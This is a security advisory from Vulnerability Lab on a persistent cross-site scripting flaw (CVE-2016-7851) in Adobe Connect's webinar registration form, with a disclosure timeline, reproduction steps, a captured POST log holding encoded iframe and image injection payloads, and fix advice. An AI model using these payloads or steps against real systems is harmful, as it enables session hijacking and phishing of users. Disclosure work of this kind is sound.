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Adobe Connect & Desktop v9.5.7 - Persistent Vulnerability

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<HTML><HEAD><TITLE>Adobe Connect & Desktop v9.5.7 - Persistent Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Document Title: =============== Adobe Connect & Desktop v9.5.7 - Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1838 Security ID: PSIRT-5180 Bulletin: https://helpx.adobe.com/security/products/connect/apsb16-35.html http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7851 Public News Article: http://www.securityweek.com/adobe-patches-9-flash-player-flaws-reported-zdi CVE-ID: ======= CVE-2016-7851 Release Date: ============= 2016-11-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1838 Common Vulnerability Scoring System: ==================================== 3.7 Product & Service Introduction: =============================== Whether it is a smartphone or tablet app, a game, a video, a digital magazine, a website, or an online experience, chances are that it was touched by Adobe technology. Our tools and services enable our customers to create groundbreaking digital content, deploy it across media and devices, and then continually measure and optimize it based on user data. By providing complete solutions that combine digital media creation with data-driven marketing, we help businesses improve their communications, strengthen their brands, and ultimately achieve greater business success. (Copy of the Vendor Homepage: http://www.adobe.com/aboutadobe/) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered an application-side vulnerability in the Adobe Connect online web-application and v9.5.6 windows software. Vulnerability Disclosure Timeline: ================================== 2016-04-27: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-04-28: Vendor Notification (PSIRT Adobe Security Team) 2016-04-29: Vendor Response/Feedback (PSIRT Adobe Security Team) 2016-10-20: Vendor Fix/Patch (Adobe Service Developer Team) 2016-11-08: Security Acknowledgements (Adobe Security Team) 2016-11-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Adobe Systems Product: Adobe Connect - Online Service (Web-Application) 2016 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side input validation and xss vulnerability has been discovered in the Adobe Connect online web-application and v9.5.6 windows software. The input validation and filter issue allows remote attackers to inject own malicious script codes to the server-side of the vulnerable modules context. The vulnerability is located in the `firstname`,`lastname` and `companyname` parameter of the `event_registration.html` file submit POST method request. Remote attackers are able to inject own malicious script codes in the vulnerable parameters POST method request to manipulate the adobe connect events service emails for the webinar registration module. The email body does not encode the input values and the registration is not restricted on inputs as well, which results in the application-side script code execution. Attackers are also able to followup the webinar links with the injected credentials which may be result in a second persistent script code execution as well. The injection point is the registration input form of the webinar in adobe connect and the execution point occurs in the email body context of the admin@adobeconnect.com email address. The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources and persistent manipulation of affected or connected service module context. Request Method(s): Inject [+] POST Vulnerable Module(s): [+] Events - Webinar Registration Form Vulnerable File(s): [+] event_registration.html Vulnerable Parameter(s): [+] firstname [+] lastname [+] companyname Affected Module(s): [+] (admin@adobeconnect.com) Proof of Concept (PoC): ======================= The persistent vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open your mailbox and click to the portals webinar email for administrators 2. Surf to the signup registration of adobe connect next to the events reck 3. Inject to the firstname, lastname and companyname your own script code payload 4. Submit the POST request to get activated for the webinar to hackerone via adobe connect 5. Check the local input of the registered account 6. The script code payloads of the name values are replied by the email service without secure encode Note: The execution of the payloads occurs directly after the arrival and view 7. Now choose in the email the link to the webinar that is connected to the name values 8. Join the channel and write a message for interaction 9. The code executes in several sections of the webinar adobe connect events service with persistent vector 10. Successful reproduce of the both application-side vulnerabilities in adobe via hackerone! PoC: event_registration.html <div style="font-size: 12pt;color: #1d1d1d;font-family: Tahoma;font-style: normal;background-color: #FFFFFF;"> <p>>"<[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]></p> <p>We are pleased to confirm your registration for The Art and Science of Bug Bounty Triage - April 28, 2016. We look forward to your participation in the event.</p> </div> --- PoC Session Logs [POST] --- Status: 200[OK] POST https://events-na1.adobeconnect.com/content/connect/connect-action?sco-id=2159915051 Mime Type[text/html] Request Header: Host[events-na1.adobeconnect.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate, br] Referer[https://events-na1.adobeconnect.com/content/connect/c1/2152090704/en/events/event/shared/2159889590/event_registration.html?sco-id=2159915051&campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2&_charset_=utf-8] Cookie[2159915051_campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2; connectevent_campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2; BREEZESESSION=na1breezpuz9xczd47kqnkqt; time-zone=Europe%2FBerlin; s_cc=true; s_sq=acnapvtpyd8zd0ka1b3qdt5jp4i76%3D%2526pid%253Dhttps%25253A%25252F%25252Fevents-na1.adobeconnect.com%25252Fcontent%25252Fconnect%25252Fc1%25252F2152090704%25252Fen%25252Fevents%25252Fevent%25252Fshared%25252F2159889590%25252Fevent_registration.html%25253Fsco-id%25253D2159915051%252526campaign-id%25253DDG-EM-Art%25252520of%25252520Triage-2Q2016-2%252526_charset_%25253Dutf-8%2526oid%253Dfunctiononclick(event)%25257BregFormSubmit()%25253B%25257D%2526oidt%253D2%2526ot%253DA] Connection[keep-alive] POST-Daten: 2159915054[Yes] 2159915055[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] 2159915056[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] 2159915057[adasfaf+asfasdfasfasfasdfsdfs] login[bkm%40evolution-sec.com] first-name[%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] last-name[%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] campaign-id[DG-EM-Art%2520of%2520Triage-2Q2016-2] sco-id[2159915051] reg-form-back[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.html] reg-form-success[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.result.html] action[event-register] _charset_[UTF-8] login-uri[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.login.html%3Flogin-ok%3D%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.html%26sco-id%3D2159915051] set-lang[en] reg-confirm-page[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fregistration_confirm.html] Response Header: Connection[Keep-Alive] Server[Day-Servlet-Engine/4.1.24] Content-Type[text/html;charset=UTF-8] Date[Wed, 27 Apr 2016 08:56:07 GMT] Transfer-Encoding[chunked] Set-Cookie[2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connectconnectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect] Reference(s): https://events-na1.adobeconnect.com/ https://events-na1.adobeconnect.com/content/ https://events-na1.adobeconnect.com/content/connect/ https://events-na1.adobeconnect.com/content/connect/connect-action Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable firstname, lastname and companyname input fields in the registration file POST method request. Dissallow the usage of special chars and restrict the input to prevent further script code injection attacks. Encode the email body context of the adobe connect service mails after the registration. Block script code tags or escape and encode them as well. Please follow the instructions in the adobe security bulletin to resolve the issue - Adobe Connect 9.5.7 windows desktop version. URL: https://helpx.adobe.com/adobe-connect/release-note/adobe-connect-9-5-7-release-notes.html Security Risk: ============== The security risk of the application-side vulnerability in the events webinar web-application and windows desktop software is estimated as medium. (CVSS 3.7) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 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